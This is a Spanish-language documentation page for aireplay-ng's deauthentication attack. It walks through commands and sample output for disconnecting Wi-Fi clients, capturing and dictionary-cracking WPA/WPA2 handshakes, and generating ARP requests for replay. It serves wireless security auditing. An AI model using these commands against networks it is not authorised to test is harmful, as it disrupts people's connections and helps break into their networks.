Tabla de Contenidos
Deautenticación
Descripción
Este ataque envia paquetes de desasociación a uno o más clientes que están actualmente asociados a un punto de acceso. Las razones por las que es útil desasociar clientes pueden ser:
- Recuperar o desvelar un ESSID oculto. Este es un ESSID que no es divulgado o anunciado por el AP.
- Capturar handshakes WPA/WPA2 forzando a los clientes a volverse a autenticar
- Generar peticiones ARP (en Windows, algunas veces, los clientes borran su “ARP cache” cuando son desconectados)
Por supuesto, este ataque es totalmente inútil si no existen clientes wireless asociados.
Uso
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Donde:
- -0 significa deautenticación
- 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras); 0 significa enviarlas continumente
- -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
- -c 00:0F:B5:34:30:30 es la dirección MAC del cliente a deautenticar; si se omite serán deautenticados todos los clientes
- ath0 es el nombre de la interface
Ejemplos de uso
Deautenticación típica
Primero, es necesario averiguar si hay algún cliente actualmente conectado. Necesitaremos su dirección MAC para el siguiente comando:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Donde:
- -0 significa deautenticación
- 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras)
- -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
- -c 00:0F:B5:34:30:30 es la dirección MAC del cliente que queremos deautenticar
- ath0 es el nombre de la interface
La salida será algo similar a esto:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
Captura del Handshake WPA/WPA2 con Atheros
airmon-ng start ath0 airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0 (y abrimos otra consola) aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 (esperamos algunos segundos) aircrack-ng -w /path/to/dictionary out.cap
A continuación explicamos estos comandos:
airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0
Donde:
- -c 6 es el número del canal
- –bssid 00:14:6C:7E:40:80 limita los paquetes capturados únicamente a este punto de acceso
- -w out es el nombre del archivo donde se guardarán las capturas
- ath0 es el nombre de la interface
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
Donde:
- -0 significa ataque de deautenticación
- 5 es el número de paquetes de deautenticación a enviar
- -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
- -c 00:0F:B5:AB:CB:9D es la dirección MAC del cliente que queremos deautenticar
- ath0 es el nombre de la interface
A continuación puedes ver la salida del comando “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”
12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
Generar peticiones ARP con una tarjeta Prism2
airmon-ng start wlan0 airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0 (abrimos otra consola) aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0 aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
Despues de enviar los 10 paquetes de deautenticación, comenzamos a escuchar para “pescar” algún “ARP requests” con el ataque 3. La opción -h es obligatoria y tiene que ser la dirección MAC de un cliente asociado.
Si estás usando el driver wlan-ng/, deberías ejecutar el script airmon-ng (a menos que sepas lo que estás haciendo) o sino la tarjeta no funcionará de forma correcta para poder inyectar.
Pistas de uso
Es más efectivo atacar a un cliente determinado usando la opción -c.
Los paquetes de deautenticación son enviados directamente desde el PC a los clientes. Por lo que se debe comprobar que estamos físicamente cerca de los clientes para que les lleguen los paquetes que enviamos desde nuestra tarjeta wireless. (En airodump-ng mirar el PWR de los clientes y no el del AP)
Problemas de uso
Ninguno por el momento.